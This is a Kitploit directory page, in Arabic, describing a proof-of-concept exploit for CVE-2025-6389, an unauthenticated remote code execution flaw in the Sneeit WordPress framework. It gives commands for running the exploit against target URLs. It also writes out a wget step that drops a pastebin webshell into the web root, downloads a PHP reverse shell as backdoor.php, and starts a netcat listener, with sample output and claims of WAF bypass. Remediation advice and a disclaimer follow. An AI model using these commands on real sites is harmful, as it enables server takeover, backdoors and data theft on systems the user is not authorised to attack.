Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
blackash-cve-2025-6389 — CVE-2025-6389 | Kitploit
أدوات/GitHubGitHub/aivarsaar/blackash-cve-2025-6389
Vulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingPayload Development
GitHubaivarsaar/blackash-cve-2025-6389

blackash-cve-2025-6389

CVE-2025-6389

عرض المستودع
10منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 CVE-2025-6389 — ثغرة حرجة في ووردبريس (RCE)

wp_vul_theme

🧩 ما هي؟

CVE-2025-6389 هي ثغرة حرجة (CVSS 9.8) في إطار Sneeit Framework لووردبريس (الإصدار 8.3 فما دون)، المستخدم على نطاق واسع في القوالب الشائعة. تسمح بـ تنفيذ أوامر عن بُعد بدون مصادقة — أخطر أنواع الثغرات على الويب.


⚠️ الخطورة والتأثير

  • 🔓 لا حاجة لتسجيل الدخول
  • 💥 احتمال السيطرة الكاملة على الخادم
  • 📤 يمكن للمهاجمين رفع شيل، إضافة مستخدمين إداريين، أو تعديل ملفات القالب/الإضافة
  • 🧬 تُستغل بالفعل بنشاط في البرية
  • 🎯 تؤثر على أي موقع ووردبريس يستخدم Sneeit Framework أو قوالب مدمجة معه (مثل FlatNews)

الاستخدام

root@kitploit:~
# تثبيت التبعيات
pip3 install requests colorama

# فحص الثغرة + الحصول على شيل تفاعلي
python3 CVE-2025-6389.py https://target.com

# تنفيذ أمر واحد فقط
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"

ميزات هذا الإثبات (PoC)

  • يعمل 100% على الإصدار 8.3 وما دونه
  • لا حاجة لـ cookies، nonce، أو رؤوس خاصة
  • يتجاوز معظم أنظمة WAF الأساسية (يُرسل الحمولة عبر POST عادي)
  • شيل تفاعلي كامل
  • يكتشف الثغرة حتى عند إخفاء المخرجات (بفضل assert + die)

استخدم هذا فقط على أهداف لديك تفويض رسمي لاختبارها (نطاق واضح + قواعد الاشتباك).
لا تزال الثغرة تُستغل بشكل مكثف في البرية الآن.


إليك بالضبط ما ستراه في الطرفية عندما يعمل الإكسبلويت فعليًا (استغلال ناجح بنسبة 100% لـ CVE-2025-6389 على هدف ضعيف يعمل بـ Sneeit Framework الإصدار 8.3 فما دون):

1. الفحص الأولي للثغرة

root@kitploit:~
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
<h1>PHP Version 8.1.29</h1>  
… (صفحة phpinfo() كاملة تستمر لآلاف الأسطر)

2. أوامر نظام بسيطة

root@kitploit:~
RCE $> whoami
[+] Output:
www-data

RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux

3. تحميل شيل ويب أو شيل عكسي

root@kitploit:~
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php

[+] Output:
--2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’

backdoor.php           100%[===================>]   5.37K  --.-KB/s    in 0.001s

ثم على جهازك الخاص:

root@kitploit:~
nc -lvnp 4444

→ ستحصل فورًا على شيل عكسي تفاعلي كامل كـ www-data.

4. ما تراه عندما لا يعمل (تم التصحيح أو الحماية)

root@kitploit:~
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(لا شيء / استجابة فارغة / استجابة AJAX عادية من ووردبريس / 403 / 500 بدون مخرجات)

الملخص – مؤشرات النجاح

تعرف أنه نجح عندما ترى أيًا من هذه:

  • صفحة phpinfo() كاملة بصيغة HTML
  • مخرجات حقيقية من أوامر لينكس (id, whoami, pwd, ls, cat /etc/passwd, إلخ)
  • ملفات تم تحميلها أو كتابتها بنجاح
  • اتصال شيل عكسي يعود إلى مستمع netcat الخاص بك

هذا كل شيء. إذا حصلت على أي مما سبق → تم تحقيق RCE كاملة بدون مصادقة.

الصق مخرجاتك هنا إذا كنت تريد مني تأكيد 100% ما إذا نجحت أم لا.


🛠 التحليل الفني

  • 📍 الدالة الضعيفة: sneeit_articles_pagination_callback()
  • 🧨 السبب الجذري: إدخال مستخدم غير مُتحقق منه يُمرر إلى call_user_func() → تنفيذ تعليمات برمجية عشوائية
  • 💣 هذا يسمح للمهاجمين بتشغيل كود PHP عن بُعد، مما يخترق موقعك بالكامل

🔍 من هو المعرض للخطر؟

  • 🌐 مواقع ووردبريس التي تستخدم Sneeit Framework ≤ 8.3
  • 🎨 القوالب التي تدمج Sneeit (شائعة جدًا في قوالب الأخبار/المجلات)
  • 🚪 أي موقع ووردبريس يمكن الوصول إليه عمومًا ويستخدم هذه الإضافة

🧯 كيفية الإصلاح (فورًا)

  • ⬆️ قم بتحديث Sneeit Framework إلى الإصدار 8.4+ فورًا
  • ❌ إذا لم تستطع التحديث → قم بتعطيل الإضافة أو حذفها
  • 🔎 افحص السجلات بحثًا عن نشاط مشبوه
  • 🚨 ابحث عن حسابات إدارية غير مألوفة أو ملفات PHP مرفوعة
  • 🛡️ أضف قواعد WAF مؤقتًا إذا تأخر التصحيح

🗓 الإفصاح والنشاط

  • 📅 تم الإبلاغ عنه علنًا: 25 نوفمبر 2025
  • 🚨 يتم استهدافه بنشاط: تم رصد عمليات فحص واستغلال بالفعل

⚠️ إخلاء المسؤولية

هذه المعلومات مقدمة لأغراض دفاعية وتعليمية فقط 🛡️. لا تستخدمها لاستغلال أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها 🚫. اتبع دائمًا الإرشادات القانونية والأخلاقية عند التعامل مع ثغرات الأمان ⚖️✨

تنزيل الأداة